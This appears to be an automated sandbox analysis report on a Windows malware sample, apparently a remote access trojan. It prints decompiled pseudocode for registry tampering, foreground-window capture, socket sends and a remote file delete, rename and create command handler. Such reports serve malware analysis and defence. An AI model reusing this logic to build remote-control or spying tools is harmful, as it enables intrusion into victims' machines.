0x0041269e
0x0041269e
0x0041261c
0x0041261c
0x0041261f
0x00412628
0x0041262a
0x00412630
0x00412635
0x00412635
0x00000000
0x00412635
0x004125ee
0x004125f5
0x004125f7
0x004125fd
0x00412602
0x00000000
0x00412602
0x004125be
0x004125c5
0x004125c7
0x004125cd
0x00412638
0x00412638
0x0041263a
0x0041263a
0x00000000
0x00000000
0x0041273f
0x00412740
0x00412746
0x00412748
0x00412756
0x00412760
0x00412768
0x0041276e
0x00412775
0x00412779
0x0041277d
0x00412782
0x00412785
0x00412789
0x0041278b
0x00412790
0x00412792
0x00412797
0x00412b26
0x00412b26
0x00412b2a
0x00412b2a
0x00412b2a
0x00000000
0x00000000
0x004126ac
0x004126ae
0x004126b4
0x004126bb
0x004126c4
0x004126c6
0x004126cb
0x004126da
0x004126dd
0x004126e4
0x004126e8
0x004126ef
0x004126f1
0x004126f8
0x00412701
0x0041271c
0x00000000
0x0041271c
0x00000000
0x00000000
0x00412725
0x0041272b
0x0041272d
0x00412733
0x00412739
0x00412739
0x00000000
0x00412739
0x00000000
0x00000000
0x004127a3
0x004127ac
0x004127b3
0x004127b5
0x00000000
0x00000000
0x004127bf
0x004127c3
0x004127c7
0x004127cb
0x004127cf
0x004127d8
0x004127da
0x004127df
0x004127e3
0x004127e5
0x004127eb
0x004127ee
0x004127f4
0x00412801
0x004121ce
0x004121ce
0x004121ce
0x00000000
0x00000000
0x0041280b
0x00000000
0x00000000
0x00412817
0x0041281b
0x00412820
0x00412823
0x0041282b
0x00000000
0x00000000
0x00412837
0x0041283b
0x00412840
0x00412843
0x0041284b
0x00000000
0x00000000
0x00412857
0x0041285b
0x00412860
0x00412863
0x0041286b
0x00000000
0x00000000
0x00412875
0x00412876
0x0041287b
0x0041287d
0x00412883
0x00412885
0x0041288b
0x0041288d
0x00412897
0x0041289e
0x0041289f
0x004128aa
0x004128ac
0x004128b7
0x004128c1
0x004128c3
0x00000000
0x00000000
0x004128cf
0x004128d3
0x004128d8
0x004128db
0x004128e3
0x00000000
0x00000000
0x00412919
0x0041291d
0x00412922
0x00412925
0x0041292d
0x00412a82
0x00000000
0x00000000
0x00411e0b
0x00411e03
0x00411df9
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 00411D92
GetTickCount.KERNEL32 ref: 00411E12

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CountEventTick
String ID:
API String ID: 180926312-0
Opcode ID: 8cebaf1b463f70975e6895d9ecbb08321523cfb0819aeaa9aba124d6f9c7ab18
Instruction ID: 615ce1591b57c20b31945536f17f605906eb84056074feb92e2c30252748a10f
Opcode Fuzzy Hash: 8cebaf1b463f70975e6895d9ecbb08321523cfb0819aeaa9aba124d6f9c7ab18
Instruction Fuzzy Hash: F9E183716043019AC614FB72DD67AAE72A89F90308F40093FF542A71E2EE7C9A45C79B

Uniqueness

Uniqueness Score: -1.00%

Function 00410497, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00410497(void* __ecx, char* __edx, char* _a4, char _a8, int _a32) {
				void* _v8;
				long _t12;
				int _t15;
				long _t17;
				signed int _t19;
				signed int _t20;

				_push(__ecx);
				_push(_t19);
				_t12 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
				if(_t12 != 0) {
					_t20 = 0;
				} else {
					_t15 = E00402469();
					_t17 = RegSetValueExA(_v8, _a4, 0, _a32, L00401F75( &_a8), _t15); // executed
					RegCloseKey(_v8);
					_t20 = _t19 & 0xffffff00 | _t17 == 0x00000000;
				}
				L00401FA7();
				return _t20;
			}

0x0041049a
0x0041049b
0x004104a6
0x004104ae
0x004104e7
0x004104b0
0x004104b4
0x004104ce
0x004104d9
0x004104e2
0x004104e2
0x004104ec
0x004104f7

APIs

RegCreateKeyA.ADVAPI32 ref: 004104A6
RegSetValueExA.KERNEL32(0045F6E8,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,00417937,WallpaperStyle,0045F6E8,?,00000001,00000000,00000000), ref: 004104CE
RegCloseKey.ADVAPI32(0045F6E8,?,?,00417937,WallpaperStyle,0045F6E8,?,00000001,00000000,00000000,?,00412B26), ref: 004104D9

Strings

Control Panel\Desktop, xrefs: 004104A0, 004104B0

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Control Panel\Desktop
API String ID: 1818849710-27424756
Opcode ID: db09fa6fb2e463226e4be43a53c532062d4d151369212ac92ed6a20ced9a740c
Instruction ID: 9045ae6a7ebcd238780a3c55024b685f51bb899022283947814aae02ff94998e
Opcode Fuzzy Hash: db09fa6fb2e463226e4be43a53c532062d4d151369212ac92ed6a20ced9a740c
Instruction Fuzzy Hash: ECF09672500208FFCB009FA1DD45EEE376CEF04751F108166BD05A61A1E7759F54DA94

Uniqueness

Uniqueness Score: -1.00%

Function 00404C75, Relevance: 6.1, APIs: 4, Instructions: 128
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00404C75(void* __ecx, void* __edx, intOrPtr _a4, _Unknown_base(*)()* _a8, char _a12) {
				signed int _v12;
				signed int _v16;
				void* _v20;
				char _v44;
				char _v68;
				void* __ebx;
				void* __esi;
				void* _t41;
				signed int _t46;
				void* _t70;
				void* _t73;
				void* _t74;
				struct _SECURITY_ATTRIBUTES* _t77;
				void* _t101;
				intOrPtr _t103;
				void* _t105;
				void* _t106;
				void* _t107;

				_t101 = __edx;
				_v12 = _v12 & 0x00000000;
				_t105 = __ecx;
				_v20 = __ecx;
				 *(__ecx + 0x48) =  *(__ecx + 0x48) & 0x00000000;
				E004020B5(_t74,  &_v44);
				_t103 = _a4;
				_t8 = _t105 + 0x4c; // 0x46c334
				_t41 = _t8;
				while(L00404E1B(_t105, L00401F75(_t103),  &_v12, _t41) != 0) {
					_t10 = _t105 + 0x40; // 0x8
					_t46 =  *_t10 & 0x000000ff;
					_v16 = _t46;
					if(_v12 + _t46 <= E00402469()) {
						_t77 = 0;
						__eflags = 0;
					} else {
						_t77 = 1;
						_t73 = E00402469();
						_t105 = _v20;
						_t103 = _a4;
						 *((intOrPtr*)(_t105 + 0x48)) = _v16 + _v12 - _t73;
					}
					if(_t77 == 0) {
						_t78 = _v16;
						L00401FB1( &_v44, _t101, _t105, E00404286(_t103,  &_v68, _v16, 0xffffffff));
						L00401FA7();
						L00401FB1( &_v44, _t101, _t105, E00404286( &_v44,  &_v68, 0, _v12));
						L00401FA7();
						_t112 = _a12;
						if(_a12 != 0) {
							_t30 = _t105 + 0x1c; // 0x46c304
							L00401F8D(_t30,  &_v44);
							 *(_t105 + 0x34) = CreateEventA(0, 0, 0, 0);
							__eflags = 0;
							CreateThread(0, 0, _a8, _t105, 0, 0); // executed
							_t33 = _t105 + 0x34; // 0x0
							WaitForSingleObject( *_t33, 0xffffffff);
							_t34 = _t105 + 0x34; // 0x0, executed
							FindCloseChangeNotification( *_t34); // executed
						} else {
							_t107 = _t106 - 0x18;
							E004020CC(_t78, _t107, _t101, _t112,  &_v44);
							_a8(_t105);
							_t106 = _t107 + 0x1c;
						}
						L00401FB1(_t103, _t101, _t105, E00404286(_t103,  &_v68, _v12 + _t78, 0xffffffff));
						L00401FA7();
						_t70 = E00402469();
						_t38 = _t105 + 0x4c; // 0x46c334
						_t41 = _t38;
						if(_t70 != 0) {
							continue;
						}
					}
					break;
				}
				return L00401FA7();
			}

0x00404c75
0x00404c7b
0x00404c81
0x00404c87
0x00404c8a
0x00404c8e
0x00404c93
0x00404c96
0x00404c96
0x00404c99
0x00404cb5
0x00404cb5
0x00404cbe
0x00404cca
0x00404ce8
0x00404ce8
0x00404ccc
0x00404cce
0x00404cd0
0x00404cd8
0x00404cde
0x00404ce3
0x00404ce3
0x00404cec
0x00404cf2
0x00404d07
0x00404d0f
0x00404d29
0x00404d31
0x00404d36
0x00404d3d
0x00404d54
0x00404d57
0x00404d68
0x00404d6b
0x00404d75
0x00404d7d
0x00404d80
0x00404d86
0x00404d89
0x00404d3f
0x00404d3f
0x00404d45
0x00404d4b
0x00404d4e
0x00404d4e
0x00404da5
0x00404dad
0x00404db4
0x00404dbb
0x00404dbb
0x00404dbe
0x00000000
0x00000000
0x00404dbe
0x00000000
0x00404cec
0x00404dd2

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,0046C334), ref: 00404D62
CreateThread.KERNEL32 ref: 00404D75
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00404C0E,00000000,00000098,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00404D80
FindCloseChangeNotification.KERNEL32(00000000,?,?,00404C0E,00000000,00000098,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00404D89

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
String ID:
API String ID: 2579639479-0
Opcode ID: 0e8761143153b3b1bb20d04c244ec56af282c26cb13b31bb76ae4dafc591a6f2
Instruction ID: cbfc7610f1747364fbbe4b4b0207945bb515dde49c32b1736f6b22da19d138b3
Opcode Fuzzy Hash: 0e8761143153b3b1bb20d04c244ec56af282c26cb13b31bb76ae4dafc591a6f2
Instruction Fuzzy Hash: 67414FB1900219AFDB10EBA5CC55DFEBB7DAF44325F04066EF512B32D1DB38AA058A64

Uniqueness

Uniqueness Score: -1.00%

Function 00410420, Relevance: 4.5, APIs: 3, Instructions: 42
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00410420(char* __edx, char* _a4, char* _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v12;
				char _v1040;
				long _t17;

				if(RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v12) != 0) {
					L3:
					return 0;
				}
				_t17 = RegQueryValueExA(_v12, _a4, 0, 0, _a8,  &_a12);
				RegCloseKey(_v12); // executed
				if(_t17 != 0) {
					goto L3;
				}
				E00405A2F( &_v1040, _a16, _a20);
				E00405AB6( &_v1040, _a8, _a12);
				return 1;
			}

0x00410444
0x00410490
0x00000000
0x00410490
0x00410455
0x00410460
0x00410468
0x00000000
0x00000000
0x00410476
0x00410487
0x00000000

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 0041043C
RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410455
RegCloseKey.KERNEL32(00000000), ref: 00410460

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 051950a050be9901e3d87e5ef00e9a8106184ddbf67cb3b65e55d040501c847b
Instruction ID: ecacb93a6b8b5b9c49bbf3e02a5795d497c0a97730d5bb5037d868723a18005e
Opcode Fuzzy Hash: 051950a050be9901e3d87e5ef00e9a8106184ddbf67cb3b65e55d040501c847b
Instruction Fuzzy Hash: CF014B31900229BFCF219F91DC45EEB7F38EF05755F004165BE0862161E6358AA5DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00410275, Relevance: 4.5, APIs: 3, Instructions: 37
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00410275(char* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				int _t12;
				long _t14;
				long _t18;

				_t12 = 4;
				_v12 = _t12;
				_v16 = _t12;
				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				}
				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12);
				return RegCloseKey(_v8) & 0xffffff00 | _t18 == 0x00000000;
			}

0x0041027d
0x0041027e
0x00410281
0x00410295
0x0041029d
0x00000000
0x004102cc
0x004102b3
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410295
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,0046C518), ref: 004102B3
RegCloseKey.ADVAPI32(?), ref: 004102BE

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 6020211f2f41a99924b2582c1e80447f15e98d83b67fb738d9560e140564669e
Instruction ID: da35563d8025d65dfadb3f1a4e24c633330656b2ed15e4664ff05724ceb20d8f
Opcode Fuzzy Hash: 6020211f2f41a99924b2582c1e80447f15e98d83b67fb738d9560e140564669e
Instruction Fuzzy Hash: 90F01D7690030CBFDF109FA09D05BEE7BBCEB04B51F1040A5FE04E6195D2719B549B94

Uniqueness

Uniqueness Score: -1.00%

Function 00416828, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00416828(intOrPtr* __ecx) {
				struct _MEMORYSTATUSEX _v68;
				intOrPtr _t8;

				_v68.dwLength = 0x40;
				GlobalMemoryStatusEx( &_v68); // executed
				 *__ecx = _v68.ullTotalPhys;
				_t8 = _v68.ullAvailPhys;
				 *((intOrPtr*)(__ecx + 4)) = _t8;
				return _t8;
			}

0x00416832
0x0041683c
0x00416845
0x00416847
0x0041684a
0x00416851

APIs

GlobalMemoryStatusEx.KERNEL32(?,00000001), ref: 0041683C

Strings

@, xrefs: 00416832

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: b8392f355100c9ee34eba0b08dd5371390c209252587410f0a35c9dbc36fdea7
Instruction ID: c898462a2bb5128df951b82e801b2690c09dfabd23704465149b681d02b3a8bf
Opcode Fuzzy Hash: b8392f355100c9ee34eba0b08dd5371390c209252587410f0a35c9dbc36fdea7
Instruction Fuzzy Hash: B7D017B58023189FC720DFA8E904A8DBBFCEB08214F00016AEC49E3300E770A8008B95

Uniqueness

Uniqueness Score: -1.00%

Function 00416AF4, Relevance: 3.0, APIs: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00416AF4(void* __ecx) {
				short _v516;
				struct HWND__* _t3;
				void* _t8;
				void* _t12;

				_t12 = __ecx; // executed
				_t3 = GetForegroundWindow(); // executed
				GetWindowTextW(_t3,  &_v516, 0x200);
				E0040425F(_t8, _t12,  &_v516);
				return _t12;
			}

0x00416afe
0x00416b00
0x00416b13
0x00416b22
0x00416b2d

APIs

GetForegroundWindow.USER32 ref: 00416B00
GetWindowTextW.USER32 ref: 00416B13

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Window$ForegroundText
String ID:
API String ID: 29597999-0
Opcode ID: ed1936a2c4b8752561982541b4ad0b17461980e660dc9b982e80c30c8d68fbd2
Instruction ID: 9b8236c0bb1c8aa832a7ee85faed8566c8cebefb93540848a6913d630803d821
Opcode Fuzzy Hash: ed1936a2c4b8752561982541b4ad0b17461980e660dc9b982e80c30c8d68fbd2
Instruction Fuzzy Hash: EED01271A1032857EB247BA49C4DAA9776CE744752F0001EAB929D3182DDB4990487D4

Uniqueness

Uniqueness Score: -1.00%

Function 00404A6E, Relevance: 1.6, APIs: 1, Instructions: 65
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00404A6E(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v32;
				void* __edi;
				void* _t27;
				void* _t29;
				void* _t55;

				_t55 = __ecx;
				_t3 = E00402469() + 4; // 0x4
				E00405218(__ebx,  &_v32, __edx, __ecx, 0xc, 0);
				 *((intOrPtr*)(E004051EA(0))) =  *((intOrPtr*)(_t55 + 0x3c));
				 *((intOrPtr*)(E004051EA(4))) = _t3;
				 *((intOrPtr*)(E004051EA(8))) = _a4;
				E00403416( &_a8);
				if( *((char*)(_t55 + 1)) != 0) {
					_push( &_v32);
					_t27 = E00402469();
					_t29 = E0041C1C7( *((intOrPtr*)(_t55 + 0x44)), L00401F75( &_v32), _t27);
				} else {
					_t29 = L00401F75( &_v32);
					__imp__#19( *((intOrPtr*)(_t55 + 4)), _t29, E00402469(), 0); // executed
				}
				L00401FA7();
				L00401FA7();
				return _t29;
			}

0x00404a76
0x00404a87
0x00404a8a
0x00404a9e
0x00404aad
0x00404ab7
0x00404ac0
0x00404ac9
0x00404aea
0x00404aee
0x00404b01
0x00404acb
0x00404ad9
0x00404ae2
0x00404ae2
0x00404b0d
0x00404b15
0x00404b21

APIs

send.WS2_32 ref: 00404AE2

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 24dfb3a0e65eb128364e790be14c841344afdd6eb15dc119a6f6783e21a3011b
Instruction ID: d78d94a8d6cbdb827bc7e6f157e18fb03a01f0323bac0fe5ff348166464f294d
Opcode Fuzzy Hash: 24dfb3a0e65eb128364e790be14c841344afdd6eb15dc119a6f6783e21a3011b
Instruction Fuzzy Hash: 9B21EF71940205AACB05FB61D856EEEB734AF60314F10813FB5227B5E2DF786A05CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00404955, Relevance: 1.5, APIs: 1, Instructions: 30
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404955(char* __ecx) {
				intOrPtr _t8;
				char _t13;
				char* _t14;

				_t14 = __ecx;
				if( *0x46baab != 0) {
					L3:
					__imp__#23(0, 1, 6); // executed
					 *((intOrPtr*)(_t14 + 4)) = _t8;
					if(_t8 == 0xffffffff) {
						L2:
						return 0;
					}
					_t13 =  *0x46bae0; // 0x0
					 *((char*)(_t14 + 0x50)) = 0;
					 *((intOrPtr*)(_t14 + 0x54)) = 0;
					 *((intOrPtr*)(_t14 + 0x4c)) = 0x3e8;
					 *((char*)(_t14 + 0x65)) = 0;
					 *((char*)(_t14 + 1)) = _t13;
					 *((intOrPtr*)(_t14 + 0x44)) = 0;
					 *_t14 = 1;
					return 1;
				}
				_t8 = E004049A8(); // executed
				if(_t8 != 0) {
					goto L3;
				}
				goto L2;
			}

0x0040495e
0x00404960
0x0040496f
0x00404976
0x0040497c
0x00404982
0x0040496b
0x00000000
0x0040496b
0x00404984
0x0040498c
0x0040498f
0x00404992
0x00404999
0x0040499c
0x0040499f
0x004049a2
0x00000000
0x004049a2
0x00404962
0x00404969
0x00000000
0x00000000
0x00000000

APIs

socket.WS2_32 ref: 00404976

Part of subcall function 004049A8: WSAStartup.WS2_32(00000202,00000000), ref: 004049BD

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Startupsocket
String ID:
API String ID: 3996037109-0
Opcode ID: 57deaf7df3839363482a97d4bb077c46ff9157abd3d4fca2155b12ae97433c1f
Instruction ID: 62ee2057d8b28695902b4436e4315656a2426cea2330156b944394806be68f62
Opcode Fuzzy Hash: 57deaf7df3839363482a97d4bb077c46ff9157abd3d4fca2155b12ae97433c1f
Instruction Fuzzy Hash: 5FF0BEF04057905ED7318F385884397BFD49B52318F04497EE2D2A37C2D2B96405876A

Uniqueness

Uniqueness Score: -1.00%

Function 004049A8, Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 004049BD

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: ac0fcd44a18d9d81a3d82cc89e4d091a56d1cbdc41663de66bf519bb87ef27f6
Instruction ID: c6028f311036b87a725e3855d38eddd9b01408ba72ab7eba5a9d2c49baa38117
Opcode Fuzzy Hash: ac0fcd44a18d9d81a3d82cc89e4d091a56d1cbdc41663de66bf519bb87ef27f6
Instruction Fuzzy Hash: 01D0123255860C4ED611AAB4AC0F8A5775CC317612F4003BAACB5C25D3F650571CC2FB

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00406930, Relevance: 39.2, APIs: 7, Strings: 15, Instructions: 716
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00406930(short* __edx, void* __eflags, intOrPtr _a4) {
				char _v108;
				void* _v112;
				char _v132;
				char _v136;
				char _v140;
				char _v152;
				char _v156;
				char _v160;
				void* _v176;
				char _v188;
				char _v192;
				void* _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				char _v284;
				char _v288;
				char _v292;
				char _v296;
				char _v300;
				char _v324;
				char _v336;
				char _v344;
				char _v368;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t163;
				signed int _t165;
				void* _t169;
				void* _t174;
				signed int _t175;
				void* _t190;
				void* _t205;
				signed int _t207;
				void* _t221;
				int _t231;
				void* _t238;
				void* _t239;
				void* _t252;
				void* _t259;
				signed int _t264;
				void* _t268;
				void* _t286;
				short* _t297;
				void* _t298;
				void* _t309;
				void* _t325;
				void* _t335;
				void* _t341;
				void* _t343;
				void* _t345;
				void* _t349;
				void* _t353;
				void* _t363;
				void* _t365;
				void* _t386;
				void* _t389;
				void* _t556;
				void* _t585;
				intOrPtr _t590;
				intOrPtr _t591;
				signed int _t592;
				signed int _t594;
				signed int _t597;
				void* _t604;
				void* _t606;
				void* _t608;
				void* _t610;
				void* _t612;
				signed int _t613;
				void* _t616;
				void* _t617;
				void* _t618;
				void* _t619;
				void* _t620;
				void* _t621;
				void* _t622;
				void* _t625;
				void* _t630;
				void* _t631;
				void* _t632;
				void* _t634;
				void* _t636;
				void* _t658;
				void* _t659;
				void* _t660;
				void* _t661;
				void* _t664;
				void* _t666;

				_t665 = __eflags;
				_t564 = __edx;
				_push(_t365);
				_t590 = _a4;
				_push(_t585);
				E004020CC(_t365,  &_v156, __edx, __eflags, _t590 + 0x1c);
				SetEvent( *(_t590 + 0x34));
				_t591 =  *((intOrPtr*)(L00401F75( &_v160)));
				E00404286( &_v160,  &_v136, 4, 0xffffffff);
				_t616 = (_t613 & 0xfffffff8) - 0xec;
				E004020CC(0x46c238, _t616, _t564, _t665, 0x46c238);
				_t617 = _t616 - 0x18;
				E004020CC(0x46c238, _t617, _t564, _t665,  &_v152);
				L00416DD0( &_v288, _t564);
				_t618 = _t617 + 0x30;
				_t666 = _t591 - 0x8b;
				if(_t666 > 0) {
					_t592 = _t591 - 0x8c;
					__eflags = _t592;
					if(__eflags == 0) {
						E0040425F(0x46c238,  &_v256, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
						_t163 = GetFileAttributesW(L00401ECB( &_v260));
						__eflags = _t163 & 0x00000010;
						if((_t163 & 0x00000010) == 0) {
							_t165 = DeleteFileW(L00401ECB( &_v260));
						} else {
							_t165 = E004170AC(L00401ECB( &_v260));
						}
						__eflags = _t165;
						__eflags = _t165 & 0xffffff00 | _t165 != 0x00000000;
						if(__eflags == 0) {
							_t619 = _t618 - 0x18;
							L00416CF4(0x46c238, _t619,  &_v252);
							_push(0x55);
							E00404A6E(0x46c238, 0x46c2e8,  &_v252, __eflags);
							_t169 = L00416C93( &_v232,  &_v280);
							_t620 = _t619 - 0x18;
							_t567 = "Unable to delete: ";
							E004075C4(0x46c238, _t620, "Unable to delete: ", _t585, __eflags, _t169);
							_t621 = _t620 - 0x14;
							_t386 = _t621;
							_push("[ERROR]");
						} else {
							_t190 = L00416C93( &_v204,  &_v252);
							_t625 = _t618 - 0x18;
							_t567 = "Deleted file: ";
							E004075C4(0x46c238, _t625, "Deleted file: ", _t585, __eflags, _t190);
							_t621 = _t625 - 0x14;
							_t386 = _t621;
							_push("[Info]");
						}
						E00402064(0x46c238, _t386);
						E004165D8(0x46c238, _t585);
						_t622 = _t621 + 0x30;
						L00401FA7();
						_t174 = L00401E29( &_v288, _t567, __eflags, 1);
						_t564 = "1";
						_t389 = _t174;
						_t175 = E00405A22("1");
						__eflags = _t175;
						if(_t175 == 0) {
							L40:
							L00401ED0();
							L41:
							L00401E54( &_v284, _t564);
							L00401FA7();
							L00401FA7();
							return 0;
						} else {
							__eflags = E00407325( &_v272, _t389, _t389) + 1;
							E00407341(E00407325( &_v272, _t389, _t389) + 1);
							_t564 =  &_v284;
							L00401EDA( &_v284,  &_v284, _t592, L00402FDA(0x46c238,  &_v236,  &_v284, 0x2a));
							L00401ED0();
							E0040425F(0x46c238, _t622 - 0x18, L00401ECB( &_v288));
							L39:
							E00406176();
							goto L40;
						}
					}
					_t594 = _t592 - 1;
					__eflags = _t594;
					if(__eflags == 0) {
						E0040425F(0x46c238,  &_v256, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
						E0040425F(0x46c238,  &_v192, L00401F75(L00401E29( &_v272, _t564, __eflags, 1)));
						E0040730B( &_v276,  &_v252, 0, E00407325( &_v268,  &_v192,  &_v192) + 1);
						_t205 = L00401ECB(E0040762B( &_v240,  &_v264,  &_v216));
						_t207 = E00439234(L00401ECB( &_v288), _t205);
						asm("sbb bl, bl");
						L00401ED0();
						_t370 =  ~_t207 + 1;
						__eflags =  ~_t207 + 1;
						if(__eflags == 0) {
							_t564 = E004075E8( &_v204, "Unable to rename file!", __eflags, 0x46c238);
							E0040530D(_t370, _t618 - 0x18, _t209, _t585, __eflags, "16");
							_push(0x59);
							E00404A6E(_t370, 0x46c2e8, _t209, __eflags);
							L00401FA7();
						} else {
							_t564 =  &_v228;
							E00407516(_t618 - 0x18,  &_v228, __eflags, "*");
							E00406176();
						}
						L00401ED0();
						L13:
						L00401ED0();
						goto L40;
					}
					_t597 = _t594 - 1;
					__eflags = _t597;
					if(__eflags == 0) {
						E0040425F(0x46c238,  &_v256, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
						_t221 = L00401F75(L00401E29( &_v272, _t564, __eflags, 1));
						_t564 =  &_v264;
						CreateDirectoryW(L00401ECB(E00407516( &_v216,  &_v264, __eflags, _t221)), 0);
						L00401ED0();
						E004032E0(0x2a);
						E00407352(0x46c238, _t618 - 0x18,  &_v264, __eflags,  &_v268);
						goto L39;
					}
					_t599 = _t597 - 3;
					__eflags = _t597 - 3;
					if(__eflags == 0) {
						_t231 = StrToIntA(L00401F75(L00401E29( &_v264, _t564, __eflags, _t599)));
						_t564 = L00401F75(L00401E29( &_v268, _t564, __eflags, 1));
						E00417868(_t231, _t233);
					}
					goto L41;
				}
				if(_t666 == 0) {
					E004020B5(0x46c238,  &_v252);
					E00404818(0x46c238,  &_v108, 1);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004049D2(_t564);
					_t238 = L00401E29( &_v284, _t564, __eflags, 3);
					_t630 = _t618 - 0xfffffffffffffff8;
					_t239 = L00401E29( &_v288, _t564, __eflags, 2);
